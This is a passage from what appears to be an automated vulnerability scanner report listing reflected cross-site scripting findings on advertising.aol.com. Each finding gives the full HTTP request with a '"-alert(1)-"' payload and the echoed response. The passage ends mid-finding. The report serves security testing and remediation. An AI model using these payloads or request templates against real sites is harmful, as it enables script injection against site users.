Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/2be31"-alert(1)-"ccced9a65eb/3/3/613602259/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.22. http://advertising.aol.com/token/4/3/1958003760/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/1958003760/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6078"-alert(1)-"429fe3342d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e6078"-alert(1)-"429fe3342d8/4/3/1958003760/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/e6078"-alert(1)-"429fe3342d8/4/3/1958003760/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.23. http://advertising.aol.com/token/4/3/543563060/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/543563060/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec8f8"-alert(1)-"c68db13757c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ec8f8"-alert(1)-"c68db13757c/4/3/543563060/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/ec8f8"-alert(1)-"c68db13757c/4/3/543563060/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.24. http://advertising.aol.com/token/4/3/677823551/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/677823551/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 842ea"-alert(1)-"425ec9af40e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /842ea"-alert(1)-"425ec9af40e/4/3/677823551/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/842ea"-alert(1)-"425ec9af40e/4/3/677823551/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.25. http://advertising.aol.com/token/5/3/1564324885/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1564324885/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdc73"-alert(1)-"5ad89bb03db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cdc73"-alert(1)-"5ad89bb03db/5/3/1564324885/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/cdc73"-alert(1)-"5ad89bb03db/5/3/1564324885/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.26. http://advertising.aol.com/token/5/3/1735492766/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1735492766/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbe0"-alert(1)-"d8ecb12d6ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bfbe0"-alert(1)-"d8ecb12d6ac/5/3/1735492766/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/bfbe0"-alert(1)-"d8ecb12d6ac/5/3/1735492766/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.27. http://advertising.aol.com/token/5/3/1874977494/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1874977494/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5879a"-alert(1)-"bb7dfa01818 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5879a"-alert(1)-"bb7dfa01818/5/3/1874977494/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/5879a"-alert(1)-"bb7dfa01818/5/3/1874977494/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.28. http://advertising.aol.com/token/6/3/1514848708/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/1514848708/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0dfd"-alert(1)-"b09ef200713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d0dfd"-alert(1)-"b09ef200713/6/3/1514848708/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/d0dfd"-alert(1)-"b09ef200713/6/3/1514848708/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.29. http://advertising.aol.com/token/6/3/1737613080/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/1737613080/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c86b2"-alert(1)-"5d2c48ff9c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c86b2"-alert(1)-"5d2c48ff9c2/6/3/1737613080/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:50:51 GMT
ETag: "aaf9c146398ac9d713fb5d92035e8e57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c86b2"-alert(1)-"5d2c48ff9c2/6/3/1737613080/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.30. http://advertising.aol.com/token/7/3/101981266/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/101981266/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95327"-alert(1)-"3f30dcc58fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /95327"-alert(1)-"3f30dcc58fb/7/3/101981266/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/95327"-alert(1)-"3f30dcc58fb/7/3/101981266/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.31. http://advertising.aol.com/token/7/3/1268491526/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1268491526/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a8c"-alert(1)-"a34ffbae454 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /15a8c"-alert(1)-"a34ffbae454/7/3/1268491526/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/15a8c"-alert(1)-"a34ffbae454/7/3/1268491526/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.32. http://advertising.aol.com/token/8/3/1715267017/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/1715267017/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fac16"-alert(1)-"9688e994782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /fac16"-alert(1)-"9688e994782/8/3/1715267017/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
